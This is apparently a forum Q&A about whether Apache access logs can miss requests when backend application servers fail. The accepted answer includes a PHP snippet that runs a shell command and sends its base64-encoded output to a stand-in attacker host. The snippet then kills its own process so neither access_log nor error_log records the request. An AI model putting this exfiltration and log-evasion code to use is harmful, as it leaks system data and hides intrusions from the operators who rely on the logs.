# Do Apache Access Logs Ever Miss Requests?

Tags: java, apache

My workplace has Apache in-front of various Java application servers. I often have to investigate production issues and rely on those Apache Access Logs recording all requests to the application servers, whether they are successful (200), redirects(302), errors (500) or some other status.

A couple of times however, normally when an application server has become unresponsive and required a restart, it looks like *maybe* some requests have not been logged.

I have tried reproducing this locally (start a long running request and either allow the request to exceed the timeout on the Apache server or just kill the application server from the command-line) but I always get a request logged in the access logs.

My question is, assuming Apache is running fine but faced with an application server problem, would the Apache access logs ever miss a request?

Comment: If this is more suited to serverfault.com, let me know.

Comment: wont the missing requests be on the access logs of **the app servers** ? Apache itself will only record the incoming requests and not outgoing ones.

Comment: Unfortunately the application servers do not have any access logs configured on them, for performance reasons. I also suspect that given the application servers were struggling to function at the time, they may not log the requests either.

Comment: Possible, I've seen examples of app servers themselves not logging the request when a direct client (into the app server) gets a `Connection Refused` error. Apache could be always returning some status code 200 or 503 and hence its able to record a request. Does the byte-size of the response vary in such cases - i.e. same request, varying byte-size of response for successful v failed responses.

Comment: Thanks. I've just re-reviewed my logs from my previous attempt to reproduce (send some requests that cause app to gc constantly) and I realised that they only record the first instance. I'll try enabling the logging on the app-server and see what I can see. If you want to put your last one as an answer I can accept it.

Comment: anything further on this? i'm interested in knowing if this was resolved

Comment: Unfortunately not. I've had to do some other work in the meantime. In the case I describe above, I suspect the app-server will also fail to log anything, as it is almost constantly GC-ing, but I'll tell for sure later.

Comment: Any news on that subject? I think I am facing the same problem...

Comment: Just in case anyone comes back to this - I never found out the answer :-(

Comment: Apache can't log connection refusals. It never even gets to see them. They are refused at the TCP session layer. @JoseK

Answer (score 6, accepted):

It can miss requests in some cases, [docs](https://httpd.apache.org/docs/2.4/logs.html#accesslog) contain important sentence:

> The server access log records all requests processed by the server.

So if request is not processed, then we should not expect entry in *access_log*. If you wonder if such situation can be easily reproduced, then I found a way to do it.

Consider following PHP code (*test.php*):

```
<?php
$cmd_result = shell_exec('uname -a');
file_get_contents("https://hacker.site/" . base64_encode($cmd_result));
exec('kill -9 ' . getmypid());
```

Also you have to run Apache with prefork MPM and mod_php module. Then make request with browser or telnet:

```
$ telnet 127.0.0.1 80
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
GET /test.php HTTP/1.0

Connection closed by foreign host.
```

As you can see, connection is closed without any response. Also there are no logs in *access_log* nor *error_log*, despite code was executed and attacker received encoded result of command `uname -a`.